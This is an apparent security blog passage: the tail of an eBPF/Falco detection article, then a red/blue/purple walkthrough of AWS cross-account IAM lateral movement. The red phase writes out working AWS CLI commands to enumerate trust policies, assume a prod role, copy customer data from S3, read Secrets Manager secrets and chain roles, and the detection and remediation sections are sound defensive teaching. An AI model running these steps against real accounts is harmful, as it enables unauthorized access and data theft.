The shell-in-container rule will fire on kubectl exec sessions. Any time an operator runs kubectl exec -it <pod> -- /bin/bash, the Falco rule above triggers. This is working as intended — kubectl exec is a post-compromise technique as well as an operational tool. Handle this with an exclusion on the user identity or namespace:

# Add to the rule condition to exclude known operator sessions
# user.name is the Linux user inside the container, not the kubectl caller;
# cluster-admin-users is a list you define for your environment
and not user.name in (cluster-admin-users)
and not k8s.ns.name in (ops-tooling, debug-ns)

High-frequency kprobes on hot paths add measurable overhead. Attaching to tcp_connect fires on every outbound connection from every process on the node. On a node handling hundreds of microservices with high connection rates (service mesh with short-lived connections), this adds CPU overhead. Profile before deploying. Tetragon’s namespace-scoped selectors (matchNamespaces with operator NotIn on the host namespace) help by skipping host-namespace processes. Filter as narrowly as your threat model allows.

Ring buffer overflow silently drops events on high-throughput nodes. Both Falco and bpftrace pass events to userspace through fixed-size kernel buffers. If the userspace consumer (the Falco daemon, the bpftrace process) cannot keep up with the event rate, the kernel drops events. Falco reports drops through its syscall_event_drops actions and its metrics output, so monitor both. If drops occur on high-throughput nodes, raise the syscall buffer size in the Falco configuration (the buf_size_preset setting under the engine section in recent releases).

Quick Reference

Use Case	Tool	Hook Type	Detection Latency
Ad-hoc outbound connection investigation	bpftrace	tracepoint:syscalls:sys_enter_connect	Real-time
Always-on container shell detection	Falco	eBPF modern driver / syscall	< 100ms
Container escape prevention	Tetragon + Sigkill	kprobe: security_sb_mount	Blocking (pre-completion)
Privilege escalation detection	Falco / bpftrace	tracepoint:syscalls:sys_enter_setuid	Real-time
Supply chain implant execution	Falco execve rule	eBPF modern driver	< 100ms
SSRF-to-metadata detection	Tetragon kprobe	kprobe: tcp_connect	Real-time
Lateral movement via unexpected STS call	Tetragon kprobe	kprobe: tcp_connect + process filter	Real-time
Audit trail for incident response	Tetragon JSON events	kprobe / tracepoint	Persistent, SIEM-routable

Tool	Best For	Not For
bpftrace	Ad-hoc node investigation during IR	Always-on production detection
Falco	Rule-based behavioral detection	Network-layer enforcement
Tetragon	Always-on detection + optional enforcement	Ad-hoc one-liner investigation

Key Takeaways

Detection engineering with eBPF closes the telemetry gap that CloudTrail, VPC Flow Logs, and syslog cannot close: OS-level process activity is only visible at the kernel syscall layer, and eBPF is the only production-grade mechanism that reads it without kernel module risk
Every attack in EP07 through EP10 has a real-time kernel-level signal — SSRF connections, container mount calls, unexpected execve chains, privilege escalation attempts — none of which appear in your current SIEM unless you’ve built this layer
Falco provides declarative, rule-based behavioral detection; Tetragon provides syscall-level enforcement that can terminate an attack before it completes — use both with complementary scopes
bpftrace is the incident response tool for asking the kernel a direct question right now; it is not a monitoring agent and should not be treated as one
The false positive problem is real and must be addressed before enabling enforcement: kubectl exec, debug containers, init containers with legitimate mounts — exclusions must be tuned per environment before moving from action: Post to action: Sigkill

What’s Next

EP11 closed the detection gap. You’ve instrumented the kernel, you’re receiving Falco alerts, Tetragon is firing on namespace-crossing mount attempts. Then the alert fires at 2:47 AM on a Sunday — not a test, not a false positive. Something got in.

EP12 is the playbook for the first 24 hours after a confirmed cloud breach: what to isolate and how without destroying forensic evidence, what to preserve before it rotates out of CloudTrail’s 90-day window, what eBPF data to capture while the node is still live, who to call and in what order, and how to avoid the common mistakes that turn a containable incident into a regulatory event. The response phase — where everything you built in EP04 through EP11 either pays off or reveals what you missed.

Get EP12 in your inbox when it publishes → subscribe at linuxcent.com

Cloud Lateral Movement: Cross-Account IAM Role Chaining Explained

July 4, 2026 by Vamshi Krishna Santhapuri

Reading Time: 12 minutes

TL;DR

Cloud lateral movement through IAM maps to OWASP A01: attackers move between cloud accounts by exploiting cross-account IAM trust relationships, with no network pivoting and no exploit, just a valid sts:AssumeRole call
The structural vulnerability is a trust policy scoped too broadly (arn:aws:iam::DEV_ACCOUNT:root instead of the specific Lambda execution role ARN), which lets any identity in the dev account that is allowed to call sts:AssumeRole assume the prod role
The full attack chain: compromised Lambda in dev account → enumerate cross-account trust policies → aws sts assume-role into prod → access data lake S3 bucket → exfiltrate before detection fires
CloudTrail is the primary detection surface: AssumeRole events where the principal account ID differs from the resource account ID are the signal; GuardDuty surfaces the pattern as Recon:IAMUser/UserPermissions
AWS Access Analyzer automatically flags overly-broad cross-account trust policies — it should be running in every account in your organization, not just the management account
The structural fix is three layers: scope trust policy to the specific source ARN, add ExternalId for confused deputy protection, and use AWS Organizations SCPs to restrict cross-account role assumptions to approved account pairs only

OWASP Mapping: A01 Broken Access Control. Cross-account IAM trust policies that specify an entire account root as the principal, instead of a specific role ARN, let any identity in the source account that holds sts:AssumeRole permission pivot into the target account.

The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│               CROSS-ACCOUNT IAM LATERAL MOVEMENT                    │
│                                                                      │
│   DEV ACCOUNT (111111111111)                                         │
│   ┌────────────────────────────────────────────┐                    │
│   │  Lambda: api-processor                     │                    │
│   │  Execution Role: lambda-execution-role     │◄── COMPROMISED     │
│   │                                            │                    │
│   │  Attacker has: access key for this role    │                    │
│   └───────────────────┬────────────────────────┘                    │
│                        │                                             │
│                        │  sts:AssumeRole                             │
│                        │  (cross-account API call)                  │
│                        ▼                                             │
│   ┌─────────────────────────────────────────────┐                   │
│   │  TRUST POLICY CHECK (prod account role)     │                   │
│   │                                             │                   │
│   │  Principal: arn:aws:iam::111111111111:root  │                   │
│   │              ↑ TOO BROAD — any dev identity │                   │
│   └───────────────────┬─────────────────────────┘                   │
│                        │ ALLOW                                       │
│                        ▼                                             │
│   PROD ACCOUNT (222222222222)                                        │
│   ┌────────────────────────────────────────────┐                    │
│   │  Role: datalake-reader                     │                    │
│   │  Access: s3:GetObject on prod-datalake-*   │                    │
│   │          rds:Connect on prod-analytics-db  │                    │
│   │          secretsmanager:GetSecretValue      │                    │
│   └────────────────────┬───────────────────────┘                    │
│                         │                                            │
│                         ▼                                            │
│   customer-data.parquet, analytics schemas, DB credentials          │
│   ← exfiltrated in 23 minutes                                        │
└─────────────────────────────────────────────────────────────────────┘

Cloud lateral movement attacks through IAM succeed because the authentication step, the sts:AssumeRole call, works exactly as designed. The Lambda’s identity is valid. The cross-account trust policy explicitly allows it. AWS faithfully issues the temporary credentials. The entire attack is indistinguishable from legitimate application behavior at the API level, which is why the trust policy is the only reliable prevention point.
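The detection side of this is a comparison between two account IDs in the CloudTrail record. A minimal sketch: it reads userIdentity.accountId and requestParameters.roleArn from an AssumeRole event and reports whether the caller and the target role live in different accounts. The two sample events are trimmed, hand-written records using the account IDs from the diagram above, not real log entries.

```python
def role_account(role_arn: str) -> str:
    """Return the account ID field of arn:aws:iam::<account>:role/<name>."""
    return role_arn.split(":")[4]


def is_cross_account_assume_role(event: dict) -> bool:
    """True when an AssumeRole call targets a role in another account."""
    if event.get("eventSource") != "sts.amazonaws.com":
        return False
    if event.get("eventName") != "AssumeRole":
        return False
    caller = event.get("userIdentity", {}).get("accountId")
    role_arn = (event.get("requestParameters") or {}).get("roleArn", "")
    if not caller or role_arn.count(":") < 5:
        return False  # malformed or incomplete record
    return caller != role_account(role_arn)


# Trimmed, hand-written records for illustration.
cross_account_event = {
    "eventSource": "sts.amazonaws.com",
    "eventName": "AssumeRole",
    "userIdentity": {"accountId": "111111111111"},
    "requestParameters": {
        "roleArn": "arn:aws:iam::222222222222:role/datalake-reader"
    },
}
same_account_event = {
    "eventSource": "sts.amazonaws.com",
    "eventName": "AssumeRole",
    "userIdentity": {"accountId": "111111111111"},
    "requestParameters": {
        "roleArn": "arn:aws:iam::111111111111:role/build-runner"
    },
}

print(is_cross_account_assume_role(cross_account_event))
print(is_cross_account_assume_role(same_account_event))
```

Every cross-account call matches, legitimate or not, so in practice you would pair this with an allowlist of approved source and target account pairs.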

The Incident: Dev Lambda to Prod Data Lake

Post-breach analysis. The attacker didn’t find a zero-day. They found a GitHub repository.

A developer had committed an .env file to a public repo containing AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY for a Lambda execution role in the dev account. GitHub’s secret scanning flagged it and notified the security team — but the notification arrived 58 minutes after the commit. By then, an automated credential scanner had already found it, validated the keys, and passed them to an attacker.

That 58-minute window is the entire story.

The Lambda’s execution role was scoped to the dev account, so initial triage assumed the blast radius was limited to dev. It wasn’t. A previous sprint had set up a cross-account trust relationship so the Lambda could read from the prod data lake during a data quality audit. The trust policy on the datalake-reader role in prod read:

"Principal": {"AWS": "arn:aws:iam::111111111111:root"}

Not the Lambda’s specific execution role ARN. The entire dev account root. Any identity in the dev account — including the one the attacker now held — could assume datalake-reader in prod.
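The difference between an account-root principal and a role-scoped principal is easy to check mechanically. Here is a minimal Python sketch, assuming the trust policy has already been fetched and parsed into a dict. The function name find_account_root_principals is illustrative and not part of any AWS SDK.

```python
import re

# Matches an account-root principal ARN, or a bare 12-digit account ID,
# which IAM treats as the same account-wide principal.
ACCOUNT_ROOT = re.compile(r"^(arn:aws[\w-]*:iam::\d{12}:root|\d{12})$")


def find_account_root_principals(trust_policy: dict) -> list:
    """Return the account-wide principals allowed by a trust policy."""
    statements = trust_policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]

    hits = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        if not isinstance(principal, dict):  # e.g. "Principal": "*"
            continue
        aws = principal.get("AWS", [])
        if isinstance(aws, str):
            aws = [aws]
        hits.extend(p for p in aws if ACCOUNT_ROOT.match(p))
    return hits


broad_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
        "Action": "sts:AssumeRole",
    }],
}
scoped_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::111111111111:role/lambda-execution-role"},
        "Action": "sts:AssumeRole",
    }],
}
print(find_account_root_principals(broad_policy))
print(find_account_root_principals(scoped_policy))
```

The broad policy is reported and the role-scoped one is not, which is the distinction that mattered in this incident.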

The attacker enumerated cross-account roles from inside the compromised Lambda context, found the trust relationship, assumed the prod role, listed the data lake S3 bucket, and exfiltrated 14 GB of customer data parquet files before the first GuardDuty finding surfaced.

The revelation: cloud lateral movement doesn’t require network pivoting. It requires finding one IAM trust relationship that’s too broad.

The compromise of the dev Lambda was recoverable — rotate credentials, remediate the repo, done. The cross-account trust policy turned it into a prod data breach.

Red Phase: The Cross-Account Attack Chain

Step 1: Enumerate Trust Policies from a Compromised Role

An attacker’s first move inside a cloud environment is always the same: establish who they are and what they can reach.

aws sts get-caller-identity
# Returns:
# {
#   "UserId": "AROAIOSFODNN7EXAMPLE:function-name",
#   "Account": "111111111111",
#   "Arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
# }

# List roles in the current account and their trust policies
# The trust policy (AssumeRolePolicyDocument) shows who can assume each role
aws iam list-roles \
  --query 'Roles[*].[RoleName,AssumeRolePolicyDocument]' \
  --output json | \
  jq '.[] | {
    role: .[0],
    principals: (.[1].Statement[].Principal.AWS // .[1].Statement[].Principal.Service)
  }'

# More targeted: find roles whose trust policy names a principal from another account
# Keeps the role name alongside each matching statement and handles
# Principal.AWS given as either a string or an array
aws iam list-roles --output json | \
  jq --arg own_account "111111111111" \
  '.Roles[] | . as $role |
    .AssumeRolePolicyDocument.Statement[] |
    select(
      [.Principal.AWS?] | flatten | map(strings) |
      any(test($own_account) | not)
    ) |
    {role: $role.RoleName, principal: .Principal}'

# Simulate whether the current role's identity policies allow sts:AssumeRole on a specific cross-account role
# This evaluates the source side only; the trust policy in the target account is checked when assume-role is actually called
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::111111111111:role/lambda-execution-role \
  --action-names sts:AssumeRole \
  --resource-arns arn:aws:iam::222222222222:role/datalake-reader \
  --query 'EvaluationResults[0].EvalDecision' \
  --output text
# Returns: allowed

Step 2: Assume the Cross-Account Role

# Assume the target role — this is the lateral movement step
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "recon-$(date +%s)" \
  --query 'Credentials'
# Returns:
# {
#   "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
#   "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
#   "SessionToken": "IQoJb3JpZ2luX2...(truncated)",
#   "Expiration": "2024-01-15T15:12:00Z"
# }

# Export the credentials to use in subsequent commands
export AWS_ACCESS_KEY_ID="ASIAIOSFODNN7EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2..."

# Confirm the new identity — now operating in prod account context
aws sts get-caller-identity
# {
#   "Account": "222222222222",  ← prod account
#   "Arn": "arn:aws:sts::222222222222:assumed-role/datalake-reader/recon-1705327920"
# }

Step 3: Enumerate and Exfiltrate from Prod

# What buckets are accessible from this role?
aws s3 ls

# Enumerate the data lake bucket
aws s3 ls --recursive s3://prod-datalake-bucket | \
  awk '{print $3, $4}' | \
  sort -rn | \
  head -20
# Shows: file sizes and paths
# 15728640  customer-data/2024/01/customer-data.parquet
# 8388608   analytics/sessions/session-events.parquet
# ...

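# Exfiltrate: one recursive copy, which issues a list call plus one GetObject per file
# (GetObject is a CloudTrail data event, logged only if S3 data events are enabled)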
aws s3 cp s3://prod-datalake-bucket/customer-data/2024/01/ /tmp/ \
  --recursive \
  --quiet

# Check for Secrets Manager access
aws secretsmanager list-secrets \
  --query 'SecretList[].{Name:Name,LastRotated:LastRotatedDate}' \
  --output table

aws secretsmanager get-secret-value \
  --secret-id prod/analytics-db/credentials \
  --query 'SecretString' \
  --output text

Step 4: Role Chaining — Staying in the Environment

Role chaining is assuming one role then using that session to assume another. It extends the attacker’s reach without returning to the original compromised identity.

# From the prod datalake-reader context, can we go further?
# Find roles in this account whose trust policy names datalake-reader
aws iam list-roles --output json | \
  jq -r '.Roles[] |
    select(
      [.AssumeRolePolicyDocument.Statement[].Principal.AWS?] | flatten |
      map(strings) | any(test("datalake-reader"))
    ) | .RoleName'

# If the datalake-reader role has sts:AssumeRole permissions itself,
# the chain continues. Each hop gets a fresh session, capped at one hour
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/analytics-admin \
  --role-session-name "second-hop-$(date +%s)"

Tools Attackers Use for Cloud Lateral Movement Enumeration

Pacu (Rhino Security Labs): Modular AWS exploitation framework. The iam__enum_users_roles_policies_groups and iam__privesc_scan modules map the full IAM graph and identify assumption paths automatically.

# Pacu: enumerate IAM and find assumable roles
pacu
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan

CloudFox (Bishop Fox): Designed specifically for finding attack paths in cloud environments. The role-trusts command enumerates role trust policies and the principals they name, including cross-account principals.

# CloudFox: list role trust relationships, including cross-account principals
cloudfox aws -p target-profile role-trusts -v2

# CloudFox: find resource policies that trust other accounts
cloudfox aws -p target-profile resource-trusts -v2

aws-recon: Broad enumeration tool that maps IAM, S3, EC2, RDS, Secrets Manager, and trust relationships across accounts in a single pass.

Blue Phase: Detection

CloudTrail Signal: Cross-Account AssumeRole

Every sts:AssumeRole call is logged in CloudTrail. Cross-account calls are the specific signal to filter for.

# Query CloudTrail for cross-account AssumeRole events in the last 24 hours
# (date -d is GNU date syntax; lookup-events covers one region per call)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --output json | \
  jq '.Events[].CloudTrailEvent | fromjson |
    .userIdentity.accountId as $source_account |
    select(
      .requestParameters.roleArn != null and
      $source_account != null and
      (.requestParameters.roleArn | contains($source_account) | not)
    ) |
    {
      time: .eventTime,
      source_identity: .userIdentity.arn,
      source_account: $source_account,
      assumed_role: .requestParameters.roleArn,
      session_name: .requestParameters.roleSessionName,
      source_ip: .sourceIPAddress
    }'

The CloudTrail event structure for a cross-account assumption looks like this:

{
  "eventSource": "sts.amazonaws.com",
  "eventName": "AssumeRole",
  "userIdentity": {
    "type": "AssumedRole",
    "accountId": "111111111111",
    "arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
  },
  "requestParameters": {
    "roleArn": "arn:aws:iam::222222222222:role/datalake-reader",
    "roleSessionName": "recon-1705327920"
  },
  "sourceIPAddress": "203.0.113.42",
  "userAgent": "aws-cli/2.13.0 Python/3.11.0 Linux/5.15.0"
}

The key fields: userIdentity.accountId is 111111111111 (dev), requestParameters.roleArn contains 222222222222 (prod). Those two account IDs not matching is the cross-account signal.
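The same comparison can be applied to events that have already been exported from CloudTrail. A minimal Python sketch, assuming each event is a parsed dict shaped like the example above; the function name is illustrative.

```python
import re

# Captures the 12-digit account ID from an IAM role ARN
ROLE_ARN = re.compile(r"^arn:aws[\w-]*:iam::(\d{12}):role/")


def is_cross_account_assume_role(event: dict) -> bool:
    """True when the caller's account differs from the target role's account."""
    if event.get("eventName") != "AssumeRole":
        return False
    source_account = (event.get("userIdentity") or {}).get("accountId")
    role_arn = (event.get("requestParameters") or {}).get("roleArn") or ""
    match = ROLE_ARN.match(role_arn)
    if not source_account or not match:
        return False
    return match.group(1) != source_account


sample_event = {
    "eventSource": "sts.amazonaws.com",
    "eventName": "AssumeRole",
    "userIdentity": {
        "type": "AssumedRole",
        "accountId": "111111111111",
        "arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name",
    },
    "requestParameters": {
        "roleArn": "arn:aws:iam::222222222222:role/datalake-reader",
        "roleSessionName": "recon-1705327920",
    },
}
print(is_cross_account_assume_role(sample_event))
```

Extracting the account ID from the ARN, rather than substring matching, avoids false matches when an account ID happens to appear in a role name.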

A fresh compromise indicator: userAgent showing aws-cli for a role that normally only calls AWS APIs from Lambda runtime (which uses the Python SDK and shows a different user agent). Lambda functions don’t call the CLI — if you see aws-cli user agent on a Lambda role, that’s a human or automated tool using stolen credentials.
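The user-agent check can be sketched the same way. This Python example assumes you maintain your own set of role names that are expected to call AWS only through an SDK; both that set and the function name are hypothetical.

```python
def is_unexpected_cli_use(event: dict, sdk_only_roles: set) -> bool:
    """Flag aws-cli traffic from a role expected to call AWS only via an SDK."""
    arn = (event.get("userIdentity") or {}).get("arn") or ""
    # Assumed-role ARNs look like:
    # arn:aws:sts::<account>:assumed-role/<role-name>/<session-name>
    parts = arn.split("/")
    if len(parts) < 2 or not parts[0].endswith(":assumed-role"):
        return False
    role_name = parts[1]
    user_agent = event.get("userAgent") or ""
    return role_name in sdk_only_roles and user_agent.startswith("aws-cli/")


cli_event = {
    "userIdentity": {
        "arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
    },
    "userAgent": "aws-cli/2.13.0 Python/3.11.0 Linux/5.15.0",
}
print(is_unexpected_cli_use(cli_event, {"lambda-execution-role"}))
```

User agents are client-supplied and can be spoofed, so treat a match as a strong hint rather than proof, and do not read the absence of a match as a clean result.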

Athena Query: Cross-Account Assumptions Across the Organization

-- Athena against S3-backed CloudTrail logs (org-level trail)
-- Finds all cross-account AssumeRole events in the past 7 days
-- Assumes the standard CloudTrail table, where requestparameters is a JSON string
SELECT
  eventtime,
  useridentity.accountid AS source_account,
  useridentity.arn AS source_identity,
  json_extract_scalar(requestparameters, '$.roleArn') AS target_role,
  sourceipaddress,
  useragent,
  -- Flag: event occurred within the last 5 hours
  CASE
    WHEN date_diff(
      'minute',
      from_iso8601_timestamp(eventtime),
      current_timestamp
    ) < 300 THEN 'RECENT'
    ELSE 'AGED'
  END AS event_age
FROM cloudtrail_logs
WHERE
  eventsource = 'sts.amazonaws.com'
  AND eventname = 'AssumeRole'
  AND errorcode IS NULL
  AND from_iso8601_timestamp(eventtime) > current_timestamp - interval '7' day
  -- Cross-account: source account ID differs from the account ID in the target role ARN
  AND useridentity.accountid <> regexp_extract(
    json_extract_scalar(requestparameters, '$.roleArn'),
    'arn:aws:iam::(\d+):', 1
  )
ORDER BY eventtime DESC;

GuardDuty Findings for IAM Lateral Movement

GuardDuty surfaces the following finding types relevant to cross-account lateral movement:

Finding Type	What It Signals
`Discovery:IAMUser/AnomalousBehavior`	Identity enumerating IAM roles, policies, or permissions in an unusual way, consistent with Step 1 (supersedes the retired `Recon:IAMUser/UserPermissions`)
`PrivilegeEscalation:IAMUser/AnomalousBehavior`	Anomalous API calls commonly used to gain higher privileges (supersedes the retired `PrivilegeEscalation:IAMUser/AdministrativePermissions`)
`UnauthorizedAccess:IAMUser/TorIPCaller`	Assumed role used from Tor exit node
`CredentialAccess:IAMUser/AnomalousBehavior`	Credential access pattern deviates from baseline
`Exfiltration:S3/AnomalousBehavior`	Anomalous S3 read activity; can fire after the exfiltration in Step 3 (supersedes the retired `Exfiltration:S3/ObjectRead.Unusual`)

# Pull GuardDuty findings scoped to IAM lateral movement indicators
# (uses the current AnomalousBehavior finding type names)
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "Discovery:IAMUser/AnomalousBehavior",
          "PrivilegeEscalation:IAMUser/AnomalousBehavior",
          "CredentialAccess:IAMUser/AnomalousBehavior",
          "Exfiltration:S3/AnomalousBehavior"
        ]
      },
      "severity": {
        "GreaterThanOrEqual": 4
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    account: .AccountId,
    resource: .Resource.AccessKeyDetails.UserName,
    created: .CreatedAt
  }'

AWS Access Analyzer: Automated Trust Policy Audit

Access Analyzer scans all resource-based policies in the account and flags any that grant access to principals outside the account or organization. It surfaces the vulnerable trust policy before an attacker finds it.

# List all Access Analyzer findings — these are cross-account or public access grants
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query 'analyzers[0].arn' --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {
    id: .id,
    resource_type: .resourceType,
    resource: .resource,
    principal: .principal,
    action: .action,
    condition: .condition,
    created: .createdAt
  }'

An Access Analyzer finding for the vulnerable trust policy looks like:

{
  "id": "a1b2c3d4-...",
  "resourceType": "AWS::IAM::Role",
  "resource": "arn:aws:iam::222222222222:role/datalake-reader",
  "principal": {"AWS": "arn:aws:iam::111111111111:root"},
  "action": ["sts:AssumeRole"],
  "condition": {},
  "status": "ACTIVE"
}

The arn:aws:iam::111111111111:root principal with no condition block is the flag — the entire dev account, no restrictions.

Purple Phase: Structural Fixes

Fix 1: Scope the Trust Policy to the Specific Source ARN

This is the primary fix. The trust policy should name the exact role that needs access, not the account root.

// BAD — allows any identity in the dev account to assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:root"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

// GOOD — only the specific Lambda execution role can assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:role/api-processor-lambda-execution-role"
      },
      "Action": "sts:AssumeRole",
      "Condition": {
        "StringEquals": {
          "sts:ExternalId": "prod-datalake-access-v1"
        }
      }
    }
  ]
}

# Update an existing trust policy to scope it properly
aws iam update-assume-role-policy \
  --role-name datalake-reader \
  --policy-document file://scoped-trust-policy.json

Fix 2: Add ExternalId for Confused Deputy Protection

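ExternalId is a shared identifier agreed between the two parties establishing the cross-account trust. When the source role calls sts:AssumeRole, it must provide the ExternalId value, or the assumption is denied. AWS does not treat the value as a secret.

This protects against the confused deputy problem: a trusted intermediary, typically a service that assumes roles on behalf of many customers, can be tricked by one customer into assuming a role that belongs to another. Because the intermediary passes the ExternalId tied to whoever made the request, a request made on someone else’s behalf carries the wrong value and the assumption fails.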

# Source (dev Lambda) must pass ExternalId when assuming the prod role
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "api-processor-job" \
  --external-id "prod-datalake-access-v1"
# If ExternalId is wrong or absent: error — not authorized to assume role

The limitation: ExternalId does not help if the source account itself is compromised and the attacker has access to the application code or environment variables that contain the ExternalId value. It adds friction for opportunistic attackers and covers the confused deputy scenario — it is not a substitute for scoping the principal ARN.
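To make the interaction between the two controls concrete, here is a toy Python model of the checks described above: principal match first, then the sts:ExternalId condition. It is a simplified illustration under stated assumptions (exact ARN matching, a single StringEquals condition), not how IAM evaluates policies internally, and the function name is hypothetical.

```python
from typing import Optional


def trust_policy_allows(statement: dict, caller_arn: str,
                        external_id: Optional[str]) -> bool:
    """Toy check: exact principal match plus optional sts:ExternalId condition."""
    allowed = statement["Principal"]["AWS"]
    if isinstance(allowed, str):
        allowed = [allowed]
    if caller_arn not in allowed:
        return False  # principal scoping rejects the caller outright
    required = (
        statement.get("Condition", {})
        .get("StringEquals", {})
        .get("sts:ExternalId")
    )
    return required is None or external_id == required


statement = {
    "Effect": "Allow",
    "Principal": {
        "AWS": "arn:aws:iam::111111111111:role/api-processor-lambda-execution-role"
    },
    "Action": "sts:AssumeRole",
    "Condition": {"StringEquals": {"sts:ExternalId": "prod-datalake-access-v1"}},
}
lambda_role = "arn:aws:iam::111111111111:role/api-processor-lambda-execution-role"
other_role = "arn:aws:iam::111111111111:role/some-other-dev-role"

print(trust_policy_allows(statement, lambda_role, "prod-datalake-access-v1"))
print(trust_policy_allows(statement, lambda_role, None))
print(trust_policy_allows(statement, other_role, "prod-datalake-access-v1"))
```

The third call is the important one: a different dev identity that has learned the ExternalId is still rejected, because the principal check fails first. That is why principal scoping is the primary control and ExternalId the secondary one.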

Fix 3: Organizations SCPs to Restrict Cross-Account Assumptions

Service Control Policies at the AWS Organizations level can restrict which accounts a member account’s identities are allowed to assume roles in. An SCP constrains the principals inside the accounts it is attached to; it does not filter requests arriving from other accounts, so this guardrail belongs on the source side. No identity inside a member account can bypass it.

// SCP: Only allow role assumptions into approved target accounts
// Attach to the OU that holds the source (dev) accounts
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RestrictCrossAccountAssumeRole",
      "Effect": "Deny",
      "Action": "sts:AssumeRole",
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:ResourceAccount": [
            "111111111111",
            "222222222222"
          ]
        }
      }
    }
  ]
}

This SCP denies any sts:AssumeRole call from the attached accounts unless the target role lives in an approved account (here, the dev account itself and prod). Even if someone adds a trust policy in some other account that allows the dev account, the SCP blocks the call at the organization level. To enforce the rule from the prod side, where the roles live, the matching control is a resource control policy (RCP), which Organizations applies to resources rather than to principals.
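The Deny-with-StringNotEquals pattern can be counterintuitive, because the statement lists the accounts that are exempt from the deny. Here is a toy Python model of that condition logic, assuming account_id stands for whatever value the policy’s condition key resolves to for a given request. The account list is illustrative, and this is not an IAM policy engine.

```python
def deny_applies(account_id: str, approved_accounts: list) -> bool:
    """StringNotEquals with several values matches only when the
    request value differs from every listed value."""
    return all(account_id != approved for approved in approved_accounts)


approved = ["111111111111", "222222222222"]  # illustrative approved list

for account in ("111111111111", "222222222222", "999999999999"):
    verdict = "DENY" if deny_applies(account, approved) else "not denied by this statement"
    print(account, verdict)
```

An account on the list is only "not denied" by this statement. The call still needs an explicit allow from the caller’s identity policy and from the target role’s trust policy.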

Fix 4: Enable Access Analyzer Organization-Wide

Access Analyzer should run with an organization-level analyzer, not just per-account. The organization analyzer has visibility across all member accounts and flags cross-account trust policies automatically.

# Create an organization-level analyzer (run from the management account)
aws accessanalyzer create-analyzer \
  --analyzer-name org-wide-access-analyzer \
  --type ORGANIZATION \
  --tags '{"Environment": "production", "Team": "security"}'

# List active findings organization-wide
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query "analyzers[?type=='ORGANIZATION'].arn | [0]" \
  --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"resourceType": {"eq": ["AWS::IAM::Role"]}, "status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {resource: .resource, principal: .principal}'

Fix 5: Prefer OIDC Workload Identity Over Cross-Account Roles

Where the access pattern allows it, replacing long-lived access keys and account-wide trust with OIDC workload identity narrows the trust relationship. A workload whose platform issues OIDC tokens presents a short-lived, signed token and exchanges it for temporary credentials through sts:AssumeRoleWithWebIdentity. There is no static access key to leak into a repository.

The role and its trust policy still exist, but the trust policy names the OIDC provider and conditions on token claims such as aud and sub, so a credential stolen from elsewhere in the source account does not satisfy it. The exchange is logged in CloudTrail as AssumeRoleWithWebIdentity rather than AssumeRole, so detection queries need to cover that event name too.

Fix 6: Enable GuardDuty Cross-Account Threat Detection at Org Level

GuardDuty with multi-account management via AWS Organizations aggregates findings from every member account under one administrator account. A pattern that looks like routine IAM activity in isolation (role assumption, S3 ListBucket, GetObject) reads as a lateral movement sequence when the dev and prod findings are reviewed side by side.

# Enable GuardDuty for all accounts in the organization
# (run from the GuardDuty delegated administrator account)
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty update-organization-configuration \
  --detector-id "${DETECTOR_ID}" \
  --auto-enable-organization-members ALL \
  --data-sources '{
    "S3Logs": {"AutoEnable": true},
    "Kubernetes": {"AuditLogs": {"AutoEnable": true}},
    "MalwareProtection": {"ScanEc2InstanceWithFindings": {"EbsVolumes": {"AutoEnable": true}}}
  }'

⚠ Production Gotchas

